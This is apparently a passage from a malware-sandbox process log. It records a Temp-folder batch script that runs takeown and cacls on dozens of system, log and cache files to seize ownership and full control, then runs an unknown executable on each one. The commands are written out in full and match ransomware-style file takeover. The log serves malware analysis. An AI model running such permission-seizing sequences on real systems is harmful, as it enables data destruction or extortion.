  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:3348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3136
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2800
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:3380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2976
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2104
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:2912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:3936
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:3828
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:2684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:456
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2800
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:3948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2516
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:3708
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat""
  2⤵
  PID:2740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat" /E /G Admin:F /C
    3⤵
    PID:756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "75fbd12bafcbd46e_COM15.dat" -nobanner
    3⤵
    PID:3216
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "75fbd12bafcbd46e_COM15.dat" -nobanner
      4⤵
      PID:112
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3932
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl""
  2⤵
  PID:1228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" /E /G Admin:F /C
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
    3⤵
    PID:2448
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
      4⤵
      PID:3104
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl""
  2⤵
  PID:2328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" /E /G Admin:F /C
    3⤵
    PID:3760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
    3⤵
    PID:3164
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
      4⤵
      PID:384
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl""
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
    3⤵
    PID:2788
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
      4⤵
      PID:3936
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl""
  2⤵
  PID:2596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" /E /G Admin:F /C
    3⤵
    PID:3388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" -nobanner
    3⤵
    PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" -nobanner
      4⤵
      PID:2088
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3136
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.51ff8642-04e7-4470-b125-403d204a2b3f.1.etl""
  2⤵
  PID:2448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.51ff8642-04e7-4470-b125-403d204a2b3f.1.etl" /E /G Admin:F /C
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.51ff8642-04e7-4470-b125-403d204a2b3f.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "NotificationUxBroker.51ff8642-04e7-4470-b125-403d204a2b3f.1.etl" -nobanner
    3⤵
    PID:2520
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "NotificationUxBroker.51ff8642-04e7-4470-b125-403d204a2b3f.1.etl" -nobanner
      4⤵
      PID:2184
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.c554354c-5d25-449b-a6b5-7968636b6069.1.etl""
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.c554354c-5d25-449b-a6b5-7968636b6069.1.etl" /E /G Admin:F /C
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.c554354c-5d25-449b-a6b5-7968636b6069.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "WuProvider.c554354c-5d25-449b-a6b5-7968636b6069.1.etl" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "WuProvider.c554354c-5d25-449b-a6b5-7968636b6069.1.etl" -nobanner
      4⤵
      PID:2812
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:2788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3920
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2856
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:3104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2972
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2104
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:2832
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:980
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:3828
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat""
  2⤵
  PID:1208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e.dat"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
    3⤵
    PID:2876
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "75fbd12bafcbd46e.dat" -nobanner
      4⤵
      PID:456
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl""
  2⤵
  PID:3784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" /E /G Admin:F /C
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
    3⤵
    PID:3524
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
      4⤵
      PID:1892
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl""
  2⤵
  PID:2520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" /E /G Admin:F /C
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
    3⤵
    PID:3228
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
      4⤵
      PID:3844
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:2812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    - Modifies file permissions
    PID:892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:764
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:2800
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl""
  2⤵
  PID:2856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" /E /G Admin:F /C
    3⤵
    PID:112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
    3⤵
    PID:2912
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
      4⤵
      PID:524
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    - Modifies file permissions
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:3944
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:2304
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:3932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    - Modifies file permissions
    PID:3920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c TaBI95AQ.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:3332
  - - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
      TaBI95AQ.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:2196
- - C:\Users\Admin\AppData\Local\Temp\TaBI95AQ.exe
    TaBI95AQ.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fc0lVuoI.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:980
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
